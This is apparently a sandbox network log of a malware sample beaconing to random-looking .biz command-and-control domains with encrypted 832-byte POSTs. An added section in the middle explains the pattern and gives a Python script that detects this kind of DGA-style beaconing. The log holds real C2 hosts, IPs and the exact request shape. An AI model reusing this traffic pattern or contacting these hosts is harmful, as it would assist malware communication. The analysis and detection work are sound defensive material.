    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:40.439369917 CET | 832 | OUT | Data Raw: fe 19 07 ac e1 89 a9 30 34 03 00 00 9a 22 32 53 52 1d 7d 4e 5c 50 f5 d3 81 97 fe 48 f2 4e 7f 8e 45 58 7f e9 dd af 4c 2c cd 04 d8 e5 27 1d dc 44 5a 4e ce 4d 74 22 76 7c d3 d7 af d3 b1 c6 31 5e 6e 42 77 91 c5 02 31 8f ee 3c a7 c4 a1 f5 b4 2f c6 93
    Data Ascii: 04"2SR}N\PHNEXL,'DZNMt"v|1^nBw1</7gl`&HWWKthUFn+#@}_L;AvCo<kuQd@N s~aI=3kl7Zu+]~ BWOMB+N
Nov 20, 2024 10:26:41.159498930 CET | 170 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 09:26:41 GMT
    Content-Length: 94
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


Session ID: 44
Source IP: 192.168.2.5
Source Port: 50027
Destination IP: 54.244.188.177
Destination Port: 80
PID: 2676
Process: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:41.390053988 CET | 355 | OUT | POST /rsqlwjdrwk HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: oshhkdluh.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:41.391333103 CET | 832 | OUT | Data Raw: 53 cc 84 67 4c e0 87 dc 34 03 00 00 38 4e 2b 5c a3 1a cc 48 74 40 7f 10 45 20 81 55 bd 02 df b2 58 1d 24 02 08 28 cb a1 f9 0a 38 f9 a4 fa a5 ee a1 9e bd b3 56 1a 42 5f a2 8f 5b ae 36 61 ed 47 bc f0 7f 6e 52 c5 ed 45 2f ec 9c 32 63 1e 7f d6 64 4a
    Data Ascii: SgL48N+\Ht@E UX$(8VB_[6aGnRE/2cdJ-a/{,IaW&x,q^Rx/U(Vx8`fA#8i86I:A|O<i>Dg|\\6y-*V4@W%53#fF|:V}*7
Nov 20, 2024 10:26:42.135647058 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:26:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=03928259540f8d563f6d160e8744ac6a|8.46.123.75|1732094802|1732094802|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 45
Source IP: 192.168.2.5
Source Port: 50028
Destination IP: 208.100.26.245
Destination Port: 80

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:42.475188971 CET | 348 | OUT | POST /khvhi HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: yunalwv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:26:42.475212097 CET | 832 | OUT | Data Raw: d6 53 e9 af b6 c8 92 e5 34 03 00 00 b3 6b c1 1e dc 5a 58 8f 39 71 d3 f8 3b bd 73 af 4f 40 99 a6 57 78 37 aa 56 49 b6 51 a2 4e f6 29 ec a8 bb fa 21 fa 5a 3a ab a9 42 e7 e5 b9 66 d1 e7 65 0d d7 c5 e1 01 e7 ba 69 17 e5 18 a9 5f 1e d8 d0 bf 28 08 15
    Data Ascii: S4kZX9q;sO@Wx7VIQN)!Z:Bfei_(CPFLJ=b-^<f+gtC;hM`x&X'P@v_,(8|e)?R5]r.P@&lN?/lsJ
Nov 20, 2024 10:26:42.985582113 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:42 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 580
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.050230980 CET351OUTPOST /xalserxg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.050250053 CET832OUTData Raw: 17 26 43 80 c0 06 54 7e 34 03 00 00 ce 29 43 f2 76 04 45 08 a9 b0 ba 1f 2f 64 37 37 fa 2b 71 90 d9 b8 e6 af d3 f7 7b 67 be e7 49 4b 31 c7 2d e3 a2 ee 4b dd 73 26 3d 1e 2a 2c b2 75 cc d8 eb ff 54 8c 0a 95 63 87 2a 66 c0 6c 55 5c f0 af bf 8a b6 a4
                                                                                                                                                                                                                                                                                                                                Data Ascii: &CT~4)CvE/d77+q{gIK1-Ks&=*,uTc*flU\vqnanLqTp82(F#ev2R3D8-P8hLj?r~x6r/Li~(&Jb5d$G8w`-<U
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.171945095 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:43 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 580
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 46 | Source IP: 192.168.2.5 | Source Port: 50030 | Destination IP: 54.244.188.177 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:44.137067080 CET | 346 | OUT | POST /wt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:44.137111902 CET | 832 | OUT | Data Raw: 0d 13 2e 48 ec 97 7f 00 34 03 00 00 25 3c 10 f4 06 10 ab f1 47 a0 63 21 25 8e ca fc c9 c3 b7 9f 96 67 cc 75 a2 9a f5 3b f3 b7 1b 69 f8 77 8e 32 a7 b3 33 d9 98 a0 2e 0b b6 bd 59 f9 50 f3 97 f5 37 cd 17 48 d2 ac 10 16 70 76 58 8f 2c bc 96 df 84 ae
Data Ascii: .H4%<Gc!%gu;iw23.YP7HpvX,C|?Q24?\TOtCVO"+<0;-a/Io5${}UH/.7T|=[|"XTKoUL=%-exvEPx! *v
Nov 20, 2024 10:26:44.861685991 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:26:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e83e7d79ff51e6c853ecf96b836e9611|8.46.123.75|1732094804|1732094804|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 47 | Source IP: 192.168.2.5 | Source Port: 50031 | Destination IP: 18.141.10.107 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:45.058069944 CET | 348 | OUT | POST /txsxc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:45.058069944 CET | 832 | OUT | Data Raw: fe 13 21 43 6a fa 30 12 34 03 00 00 05 90 90 63 cc 59 5e 31 ce 78 0e f1 02 b6 6c 1e da 43 68 7b b7 9a 6b ef cd 74 04 5e 64 ab e7 d5 14 51 67 26 25 18 ab b5 9f b4 40 85 4a 7d 11 80 61 3f 41 bc 17 79 9a 12 5c 61 46 c6 1b f4 ed 8a 57 50 9e 18 b3 9f
Data Ascii: !Cj04cY^1xlCh{kt^dQg&%@J}a?Ay\aFWPV(ch/V4?XE[-Mi-P}DJa*%hxb2"nx!B0v9 >vpx6(*g[O~#`pt-u3;zTs':G
Nov 20, 2024 10:26:46.478861094 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:26:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e6997227e07a7bf90645c1003521e367|8.46.123.75|1732094806|1732094806|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
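
The sessions above share one request shape: a POST with Content-Length 832 and the same WeChat/QQBrowser User-Agent, sent roughly a second apart to a different short .biz host each time, with a different short path each time; the hosts answer either nginx's default 404 page or a 200 with an empty chunked body and two Set-Cookie headers. That cross-session correlation, not any single request, is what a detection should key on. The script below is an added example for this report, not Joe Sandbox output and not code from the sample. Its records are constructed from the captured sessions (hosts, paths, User-Agent, Content-Length, timestamps and the first 12 body bytes); the two example.com/example.org records are invented benign controls. One further assumption is labelled in the code: in all four captured bodies, bytes 8..11 are 34 03 00 00, which is 820 little-endian, exactly Content-Length minus 12, so the example treats those bytes as a candidate length field and checks whether that relation holds rather than asserting it is the format.

```python
"""Flag DGA-style HTTP beaconing across Joe Sandbox-style HTTP session records.

Added example; not sandbox code and not code from the analysed sample.
"""
import re
from collections import defaultdict
from datetime import datetime

UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
      "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")


def beacon(ts, host, path, body_prefix_hex=None):
    """Constructed record shaped like the captured POSTs (headers only; body bytes
    are the first 12 captured bytes, or None where the excerpt does not show them)."""
    raw = (f"POST {path} HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
           f"Pragma: no-cache\r\nHost: {host}\r\nUser-Agent: {UA}\r\nContent-Length: 832\r\n\r\n")
    prefix = bytes.fromhex(body_prefix_hex) if body_prefix_hex else None
    return {"ts": ts, "raw": raw, "body_prefix": prefix}


SAMPLE = [  # constructed from the report's sessions plus two invented benign controls
    beacon("10:26:42.475", "yunalwv.biz", "/khvhi", "d653e9afb6c892e534030000"),
    beacon("10:26:43.050", "yunalwv.biz", "/xalserxg", "17264380c006547e34030000"),
    beacon("10:26:44.137", "lrxdmhrr.biz", "/wt", "0d132e48ec977f0034030000"),
    beacon("10:26:45.058", "wllvnzb.biz", "/txsxc", "fe1321436afa301234030000"),
    beacon("10:26:46.735", "gnqgo.biz", "/klerpi"),  # body not shown in the excerpt
    {"ts": "10:26:43.500", "body_prefix": None,
     "raw": "POST /api/v1/session HTTP/1.1\r\nHost: api.example.com\r\nUser-Agent: Mozilla/5.0\r\n"
            "Content-Type: application/json\r\nContent-Length: 57\r\n\r\n"},
    {"ts": "10:26:44.900", "body_prefix": None,
     "raw": "GET /index.html HTTP/1.1\r\nHost: www.example.org\r\nUser-Agent: Mozilla/5.0\r\n\r\n"},
]

VOWELS = set("aeiou")


def parse_request(raw):
    """Split an HTTP/1.1 request head into method, path, host, UA and header order."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    names, headers = [], {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        names.append(name.strip().lower())
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "host": headers.get("host", ""),
            "user_agent": headers.get("user-agent", ""),
            "content_length": int(headers.get("content-length", 0)),
            "header_order": tuple(names)}


def fingerprint(req):
    """Client fingerprint: method, exact UA, body size and header order."""
    return (req["method"], req["user_agent"], req["content_length"], req["header_order"])


def looks_random(label):
    """Cheap DGA heuristic: too few vowels, or a long consonant run."""
    if len(label) < 4:
        return False
    vowel_ratio = sum(c in VOWELS for c in label) / len(label)
    longest_run = max((len(m) for m in re.findall(r"[^aeiou]+", label)), default=0)
    return vowel_ratio < 0.25 or longest_run >= 4


def length_field_matches(body_prefix, content_length):
    """ASSUMPTION, not a documented format: the four captured bodies carry
    34 03 00 00 (820 LE = Content-Length - 12) at offset 8. Report whether that
    candidate length field is consistent; None when the body was not captured."""
    if body_prefix is None or len(body_prefix) < 12:
        return None
    return int.from_bytes(body_prefix[8:12], "little") == content_length - 12


def second_level_label(host):
    # Simplification: no public-suffix handling (co.uk etc.).
    labels = host.split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def detect_beacons(records, min_hosts=3):
    """Alert when one fingerprint talks to >= min_hosts distinct hosts, most of
    which look machine-generated; report cadence and the body-length check."""
    groups = defaultdict(list)
    for rec in records:
        req = parse_request(rec["raw"])
        req["ts"] = datetime.strptime(rec["ts"], "%H:%M:%S.%f")
        req["length_field_ok"] = length_field_matches(rec["body_prefix"], req["content_length"])
        groups[fingerprint(req)].append(req)
    alerts = []
    for fp, reqs in groups.items():
        hosts = sorted({r["host"] for r in reqs})
        if len(hosts) < min_hosts:
            continue
        random_hosts = [h for h in hosts if looks_random(second_level_label(h))]
        if 2 * len(random_hosts) < len(hosts):
            continue
        times = sorted(r["ts"] for r in reqs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        alerts.append({"method": fp[0], "user_agent": fp[1], "content_length": fp[2],
                       "hosts": hosts, "random_hosts": random_hosts,
                       "paths": sorted(r["path"] for r in reqs),
                       "mean_gap_s": sum(gaps) / len(gaps) if gaps else None,
                       "length_field_ok": [r["length_field_ok"] for r in reqs
                                           if r["length_field_ok"] is not None]})
    return alerts


if __name__ == "__main__":
    for alert in detect_beacons(SAMPLE):
        print(alert)
```

Run against the constructed records, the five .biz POSTs collapse into a single fingerprint with four distinct hosts, three of which fail the vowel test, a mean gap of about one second, and a consistent candidate length field in every captured body; the two control requests each form their own one-host group and are never reported. On real traffic the fingerprint should come from the proxy or NetFlow/HTTP log rather than from hand-built records, and the host-randomness heuristic is deliberately crude: the cross-host correlation on an identical User-Agent and fixed Content-Length is the signal that survives a change of DGA seed.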


Session ID: 48 | Source IP: 192.168.2.5 | Source Port: 50032 | Destination IP: 18.208.156.248 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:46.735423088 CET | 347 | OUT | POST /klerpi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:46.735472918 CET | 832 | OUT | Data Raw: 34 59 1e 5e 63 b7 81 03 34 03 00 00 ae 7a 7d 68 06 5b 3f 33 0c c5 6e 36 d5 aa 04 a8 7e 69 10 de 2f e0 9e fe c9 d9 ac fa a4 1a 8d 97 c3 09 a0 ea c7 ed 07 5e d9 1b 0f d8 13 ec 73 58 61 ad 6f fe f9 67 a3 5f cb fa 4d cd 49 b8 5a 7a 2c 9d 98 a5 63 93
Data Ascii: 4Y^c4z}h[?3n6~i/^sXaog_MIZz,cg\ A@.w7698NU&PI?Xu@pQbu&gW~R;.O)=+U+3{3}VX%sR.O:irI.}
Nov 20, 2024 10:26:47.183767080 CET | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:26:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a0bf06b6c40252d526d71f9db6481cac|8.46.123.75|1732094807|1732094807|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 49 | Source IP: 192.168.2.5 | Source Port: 50033 | Destination IP: 44.221.84.105 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:47.531138897 CET | 356 | OUT | POST /qehuuaxgtrfd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:47.531205893 CET | 832 | OUT | Data Raw: aa 99 8a 6a e7 86 14 1c 34 03 00 00 b5 7e bf f4 6a 8b 06 f6 c8 01 ae bc c5 f3 25 77 08 74 ef 67 dd 74 01 d9 dc 72 3e 7a ca 14 f3 34 b8 5a a2 84 ce 4d af 55 54 a7 1d 16 4d 98 f7 6e 5b d6 e1 72 18 3c 8b f8 b2 c0 7c 81 45 54 25 9c f8 68 f6 f1 99 ce
Data Ascii: j4~j%wtgtr>z4ZMUTMn[r<|ET%hEx0(m@qf"i}CzErd]#37v8iQ5\ib+&cKl48&(bI s}^O%\RV3575XeY?hJ*3f9J-_E
Nov 20, 2024 10:26:47.989826918 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:26:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6792ac43bdd7183936b5b16683910652|8.46.123.75|1732094807|1732094807|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 50 | Source IP: 192.168.2.5 | Source Port: 50034 | Destination IP: 18.141.10.107 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:48.304819107 CET | 356 | OUT | POST /srktyhawgjwb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:48.304852009 CET | 832 | OUT | Data Raw: 1b 2c 09 72 a7 6d db 81 34 03 00 00 e1 81 a3 d1 14 ae 47 c8 62 9b 37 52 63 44 65 3b 45 29 7e ef 77 7e 92 e5 d6 14 55 97 ba e1 39 3a f3 c7 ce 5d 38 12 96 94 5e 8b de 9c 3a 8a fa 0f fb 2a 76 d0 0f 79 23 92 a9 f7 26 20 0d 8c 2b 24 42 d2 4f 1e 30 0b
Data Ascii: ,rm4Gb7RcDe;E)~w~U9:]8^:*vy#& +$BO0Y^FwHa/D.]?6SxNWRY.b-=FW\V$,O]Kw+usYhhq74yn9!0 4okbDtq4Q
Nov 20, 2024 10:26:50.216864109 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:26:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=93a03cb1a6c782151e16afec570a4997|8.46.123.75|1732094809|1732094809|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 51 | Source IP: 192.168.2.5 | Source Port: 50036 | Destination IP: 18.208.156.248 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:51.260186911 CET | 350 | OUT | POST /wdbsnc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:51.260308027 CET | 832 | OUT | Data Raw: 8e 82 9f 0f 59 de 93 52 34 03 00 00 03 39 95 c9 a8 ae c8 73 87 79 ad 9a 65 58 9a e8 2c 98 7d e4 ba cd 86 22 3d 72 a6 3c 92 15 57 14 bc 55 0d c0 d3 5d 74 c6 5b 90 5c 0b 49 ec 78 cc 6a e7 b6 c8 1e 7c f6 57 9a a4 59 ef 92 4c ca 81 c8 ec fe 93 4e 5d
Data Ascii: YR49syeX,}"=r<WU]t[\Ixj|WYLN]cK:<o<U|P^0gVVxKrK"l"L4}V/Xu{H/InHOrN[j@b BiwN~(#F^Ko,
Nov 20, 2024 10:26:51.780299902 CET | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:26:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4ed0b599f5a18214a35d2b98229b9ded|8.46.123.75|1732094811|1732094811|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                52192.168.2.55003713.251.16.15080
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.156621933 CET350OUTPOST /yngosjtj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
